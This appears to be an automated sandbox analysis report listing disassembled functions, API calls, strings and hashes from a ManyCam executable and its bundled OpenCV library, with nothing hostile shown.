API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$V12@$??1?$basic_string@_??4?$basic_string@_?erase@?$basic_string@_?size@?$basic_string@?substr@?$basic_string@_D@2@@std@@D@std@@U?$char_traits@V01@V01@@V?$allocator@
String ID:
API String ID: 731949045-0
Opcode ID: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
Instruction ID: 4406f9edcf3e418624fedf0353d0674b6ffa21746b1b988d8d39eeb2d4d24482
Opcode Fuzzy Hash: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
Instruction Fuzzy Hash: 5C314D31900108EFDB04EF59E898A9DBBB6FB98350F40C52AF91A973A0DB30A944DF54

Function 004B14B0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

_Smanip.LIBCPMTD ref: 004B152C

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CGraphMgr::AdjustCameraResolution (size=%dx%d), xrefs: 004B14E9
vids, xrefs: 004B16FD, 004B1811

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorDebugHeapSmanip
String ID: CGraphMgr::AdjustCameraResolution (size=%dx%d)$vids
API String ID: 3240802707-243107872
Opcode ID: 0b9f26486d5ca748ff65b87eaf69692d820365cf5d3d260ad1582382175653d3
Instruction ID: a989dfa4e85d0b56287cfe2e867778c486b3f31bfd173d30f9afd811cc483807
Opcode Fuzzy Hash: 0b9f26486d5ca748ff65b87eaf69692d820365cf5d3d260ad1582382175653d3
Instruction Fuzzy Hash: D7021671900218DFCB14DF69C991BEEBBB0BF48304F50819EE519A7291DB34AE85CFA5

Function 004C9210 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,744843B1), ref: 004C928B
CloseHandle.KERNEL32(?,?,?,?,?,744843B1), ref: 004C93D8
cvReleaseImage.CXCORE099(00000000,?,?,?,?,744843B1), ref: 004C93E8

Strings

CManyCamModel::GetPosterFrame, xrefs: 004C923F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorCloseCreateDebugEventHandleHeapImageReleaseclock
String ID: CManyCamModel::GetPosterFrame
API String ID: 3295495820-604892226
Opcode ID: 0fb0d1f75a3f7064816a10a7a659a458f82e48bfb0f7d40fede8694d07b98b13
Instruction ID: b7f4d3075c697768d86108b177f770b28cc6e89c2576a85e707f138266713341
Opcode Fuzzy Hash: 0fb0d1f75a3f7064816a10a7a659a458f82e48bfb0f7d40fede8694d07b98b13
Instruction Fuzzy Hash: 81717C70D01208DFDB04EFE4C895BEEBBB4BF58304F20815DE505AB291DB786A45CBA5

Function 00B9D090 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvInitMatHeader,00C4124F,.\cxarray.cpp,000000B0,?,00B9E385,?,?,?,?,?,?,?,?,?), ref: 00B9D0AF

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(000000F1,cvInitMatHeader,00C4124F,.\cxarray.cpp,000000B3,?,00B9E385,?,?,?,?,?,?,?,?,?), ref: 00B9D0DD

Strings

cvInitMatHeader, xrefs: 00B9D0A8, 00B9D0D6, 00B9D183, 00B9D1D9
Non-positive cols or rows, xrefs: 00B9D1D4
.\cxarray.cpp, xrefs: 00B9D09E, 00B9D0CC, 00B9D179, 00B9D1CF

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxarray.cpp$Non-positive cols or rows$cvInitMatHeader
API String ID: 483703942-2660223677
Opcode ID: 1eaf8111f715c9681a9575ac84d4375bc18fab6fc036c2ea40666848097200ad
Instruction ID: 5a7b50eb9f460791862a228569d0a264d41757270444301b2ddc3f3870770978
Opcode Fuzzy Hash: 1eaf8111f715c9681a9575ac84d4375bc18fab6fc036c2ea40666848097200ad
Instruction Fuzzy Hash: D93129B374431017CB28AE1DBC62B1AB2D2E7D0B51F19427EF556E77C0D6A0A8414795

Function 00BC42A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00BC42F2
cvError.GLU32(FFFFFF37,cvMakeSeqHeaderForArray,Element size doesn't match to the size of predefined element type (try to use 0 for sequence element type),.\cxdatastructs.cpp,000002C8), ref: 00BC4361
cvError.GLU32(000000E5,cvMakeSeqHeaderForArray,00C4124F,.\cxdatastructs.cpp,000002BA), ref: 00BC43BB
cvError.GLU32(FFFFFF37,cvMakeSeqHeaderForArray,00C4124F,.\cxdatastructs.cpp,000002B7), ref: 00BC43E3

Strings

.\cxdatastructs.cpp, xrefs: 00BC434D, 00BC43AA, 00BC43CF
Element size doesn't match to the size of predefined element type (try to use 0 for sequence element type), xrefs: 00BC4352
cvMakeSeqHeaderForArray, xrefs: 00BC4357, 00BC43B4, 00BC43D9

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$memset
String ID: .\cxdatastructs.cpp$Element size doesn't match to the size of predefined element type (try to use 0 for sequence element type)$cvMakeSeqHeaderForArray
API String ID: 3826993830-1384450192
Opcode ID: afd855e0ede857492409a561939f77046dd13203ac7efab8e66a98bdd861d919
Instruction ID: 5b1b5a1feba4178e068df941ce114edd4cd8ecb15f2c4f39c9f126025b019e94
Opcode Fuzzy Hash: afd855e0ede857492409a561939f77046dd13203ac7efab8e66a98bdd861d919
Instruction Fuzzy Hash: 9631E1B278430567C3209E49DC62B27F7E4FBD4B21F084A7EF884D7780E7A4EA008695

Function 0050E6A0 Relevance: 12.4, APIs: 8, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0050E7D1
memset.MSVCR80 ref: 0050E7E8

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapmemset
String ID:
API String ID: 622753528-0
Opcode ID: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
Instruction ID: 15c03739bf2cff661cf5d104c6130bcee5a7d3e6e4c58e74d1621743953f5b5e
Opcode Fuzzy Hash: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
Instruction Fuzzy Hash: 81F17A719022199BDB28EB10CD9ABEEBBB4BF54304F1085E9E40A671D1DB745F88CF91

Function 00BA28E0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

cvError.GLU32(FFFFFF2D,cvGet1D,index is out of range,.\cxarray.cpp,000008A8), ref: 00BA298E

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvRawDataToScalar.GLU32(?,?,?), ref: 00BA29AB
cvPtr1D.GLU32(?,?,00000000), ref: 00BA29E8
cvRawDataToScalar.GLU32(00000000,?,?), ref: 00BA29F7

Strings

.\cxarray.cpp, xrefs: 00BA297A
index is out of range, xrefs: 00BA297F
cvGet1D, xrefs: 00BA2984

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: DataScalar$ErrorPtr1Status
String ID: .\cxarray.cpp$cvGet1D$index is out of range
API String ID: 2832721487-3297962117
Opcode ID: 5a4461c8685a3c8162ebc3269da5233ae8d4a2e5b6b74b841e54a59b44908e25
Instruction ID: 479de5b00e80aef373ff8266e731a2993b0cba9a6276f3ccaa423d3ce7843af2
Opcode Fuzzy Hash: 5a4461c8685a3c8162ebc3269da5233ae8d4a2e5b6b74b841e54a59b44908e25
Instruction Fuzzy Hash: FE31F4737086016BD6149F1DEC41A6BB3EAEFD0B24F184ABEF58593640D730E85887A1

Function 004CB0F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004CB139
_DebugHeapAllocator.LIBCPMTD ref: 004CB155
_DebugHeapAllocator.LIBCPMTD ref: 004CB171

Part of subcall function 004DA970: _DebugHeapAllocator.LIBCPMTD ref: 004DAA07
Part of subcall function 004DA970: _DebugHeapAllocator.LIBCPMTD ref: 004DAA16
Part of subcall function 004DA970: _DebugHeapAllocator.LIBCPMTD ref: 004DAA37

_DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
_DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

Strings

|LV, xrefs: 004CB151, 004CB1EB, 004CB154
ZP, xrefs: 004CB11F, 004CB122

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID: |LV$ZP
API String ID: 571936431-1538846667
Opcode ID: 8217c67bd42f6a567db927a5321e70c2cba3473b1a658e23f040ac260a6cc460
Instruction ID: 978cc442b74b90625ce9c3af39009df7ee77075ce9d9cefa9296828956acecd6
Opcode Fuzzy Hash: 8217c67bd42f6a567db927a5321e70c2cba3473b1a658e23f040ac260a6cc460
Instruction Fuzzy Hash: 27410AB1D05248EFCB04DFA8D991BDEBBF5BB48304F10815EF815A7281D778AA04CBA5

Function 004825C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75librarywindowCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00482602
GetWindowsDirectoryW.KERNEL32(00000000,00000104,00000104,?,0049A100,744843B1,?), ref: 00482644
LoadLibraryW.KERNEL32(00000000,\winhlp32.exe,000000FF,?,0049A100,744843B1,?), ref: 0048266A
LoadCursorW.USER32(00000000,0000006A), ref: 0048267F
CopyIcon.USER32(?), ref: 00482692
FreeLibrary.KERNEL32(00000000), ref: 004826A5

Strings

\winhlp32.exe, xrefs: 00482654

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Load$CursorLibrary$CopyDirectoryFreeIconWindows
String ID: \winhlp32.exe
API String ID: 501009500-695620452
Opcode ID: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
Instruction ID: ec6d5bdbcb5f979a409084d156352cb5eef125df936233655878cf5ad0338882
Opcode Fuzzy Hash: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
Instruction Fuzzy Hash: 0D313A71D00208AFDB04EFA4E959BEDBBB5FB18314F50462AF916A72D0DB786948CB14

Function 00C2C900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48COMMON

Download Yara Rule

APIs

cvFindType.GLU32(?), ref: 00C2C906
cvGetErrStatus.GLU32 ref: 00C2C910

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,cvUnregisterType,Inner function failed.,.\cxpersistence.cpp,0000131E), ref: 00C2C92F

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvFree_.GLU32(00000000), ref: 00C2C98A

Strings

Inner function failed., xrefs: 00C2C923
cvUnregisterType, xrefs: 00C2C928
.\cxpersistence.cpp, xrefs: 00C2C91E

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$ErrorFindFree_Typemalloc
String ID: .\cxpersistence.cpp$Inner function failed.$cvUnregisterType
API String ID: 2399918659-2864669632
Opcode ID: 31cc8f6a4386730a55aa145706e674ad667d8298b738ad2447a9aabae2b87957
Instruction ID: 737f9272a5bef59960bcd71dae3f20f6efce790d9393fc2461efa13b4af3a8fc
Opcode Fuzzy Hash: 31cc8f6a4386730a55aa145706e674ad667d8298b738ad2447a9aabae2b87957
Instruction Fuzzy Hash: DB015BB55017119FC724EF19F8C2A5E73D0AB1471171885BAE8E997F51F230E9C0D740

Function 00BC69C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvFindGraphEdge,graph pointer is NULL,.\cxdatastructs.cpp,00000C02), ref: 00BC69E2

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvGetSeqElem.GLU32(?,?), ref: 00BC69F5
cvGetSeqElem.GLU32(?,?), ref: 00BC6A11
cvFindGraphEdgeByPtr.GLU32(?,00000000,00000000), ref: 00BC6A27

Strings

graph pointer is NULL, xrefs: 00BC69D6
.\cxdatastructs.cpp, xrefs: 00BC69D1
cvFindGraphEdge, xrefs: 00BC69DB

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Elem$EdgeErrorFindGraphStatus
String ID: .\cxdatastructs.cpp$cvFindGraphEdge$graph pointer is NULL
API String ID: 695153747-4257297453
Opcode ID: fa26d755b9d204b76a64fc07c166e30a080dc940aeb3cf13bc5c6c111b0a1211
Instruction ID: 09d67fcc2f9e7040e0e6b52b06d7f23422daa96189595706a2fc0607cf4a0363
Opcode Fuzzy Hash: fa26d755b9d204b76a64fc07c166e30a080dc940aeb3cf13bc5c6c111b0a1211
Instruction Fuzzy Hash: 3EF0F677A042516BDA11661ABC12F6B27D8DFD5723F0905BDF905E3182F6608D42C1B2

Function 004042F0 Relevance: 12.1, APIs: 8, Instructions: 101COMMON

Download Yara Rule

APIs

cvCopy.CXCORE099(?,?,00000000,?,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404309
cvInvert.CXCORE099(?,?,00000000,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404321
cvGEMM.CXCORE099(?,?,?,?,?,00000000,?,?,?,?,?,FFFFFFFE), ref: 0040436B

Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 004035F7
Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,FFFFFFFE), ref: 00403603
Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 0040360F
Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 00403636
Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 0040365D

cvSetImageROI.CXCORE099(?), ref: 004043B7
cvSetImageROI.CXCORE099(?), ref: 004043D9
cvCopy.CXCORE099(?,?,00000000), ref: 004043E5
cvResetImageROI.CXCORE099(?), ref: 004043EE
cvResetImageROI.CXCORE099(?), ref: 004043F7

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image$Reset$Copy$Invert
String ID:
API String ID: 2642547888-0
Opcode ID: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
Instruction ID: 4832167a604e7eee410914a1b349f3b52c2c1ab0660e6587da0ebae9eec7833f
Opcode Fuzzy Hash: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
Instruction Fuzzy Hash: 5B3153F4A007009FC314EF14D886F57BBE4AF89710F04896DE98A57381D635E9158BA6

Function 004012F0 Relevance: 12.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000118,?), ref: 00402ED9
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000114), ref: 00402EEB
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(0000011C), ref: 00402EFD
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000120), ref: 00402F0F
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000124), ref: 00402F21
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000128), ref: 00402F33
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(0000012C), ref: 00402F45
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000130), ref: 00402F57
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000134), ref: 00402F69
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000100), ref: 00402F77
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000104), ref: 00402F89
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000110), ref: 00402F9B
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000108), ref: 00402FAD
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(0000010C), ref: 00402FBF
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(00000138), ref: 00402FD1
Part of subcall function 00402EC0: cvReleaseMat.CXCORE099(0000013C), ref: 00402FE3

cvReleaseImage.CXCORE099(?,?,?,004012A0,?), ref: 00401313
cvReleaseImage.CXCORE099(00000000,?,?,004012A0,?), ref: 00401325
cvReleaseImage.CXCORE099(00000000,?,?,004012A0,?), ref: 00401337
cvReleaseImage.CXCORE099(-000000A8,?,?,004012A0,?), ref: 00401347
cvReleaseImage.CXCORE099(?,-000000A8,?,?,004012A0,?), ref: 00401355
cvReleaseMat.CXCORE099(00000000,004012A0,?), ref: 0040136E
cvReleaseImage.CXCORE099(?,004012A0,?), ref: 0040137C
??3@YAXPAX@Z.MSVCR80(?,004012A0,?), ref: 00401387

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Release$Image$??3@
String ID:
API String ID: 4199280203-0
Opcode ID: ce4da6eb0e3a7f94bb66be05ad3657c3e2c6a0438bd0ebaefe0091d5ba8a80e6
Instruction ID: 9a6bf2f685f8ffb5b2492dd8c0792c90c05741bbbc79e9eb21885bcc9159b9e2
Opcode Fuzzy Hash: ce4da6eb0e3a7f94bb66be05ad3657c3e2c6a0438bd0ebaefe0091d5ba8a80e6
Instruction Fuzzy Hash: 8F11E9F580021297FB20AB14E84AB5BB7A8EF41700F58443AE845636D0F73DF9A5C797

Function 004C27C0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000,00000000), ref: 004C2804
std::bad_exception::bad_exception.LIBCMTD ref: 004C2818
_CxxThrowException.MSVCR80(d&L,0057CBF8), ref: 004C2826
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(d&L,0057CBF8,?,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000), ref: 004C2835

Strings

d&L, xrefs: 004C2815, 004C2822, 004C2825
map/set<T> too long, xrefs: 004C27FC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: d&L$map/set<T> too long
API String ID: 3248949544-2396053701
Opcode ID: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
Instruction ID: 0421590c6fc88a653ea049570befb3043dc480636a3316981a528d684021d55e
Opcode Fuzzy Hash: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
Instruction Fuzzy Hash: 8DD11B74A002459FCB04FFA9C991EAF7776AF89304B20456EF4159B356CB78AC05CBB8

Function 004D4D80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

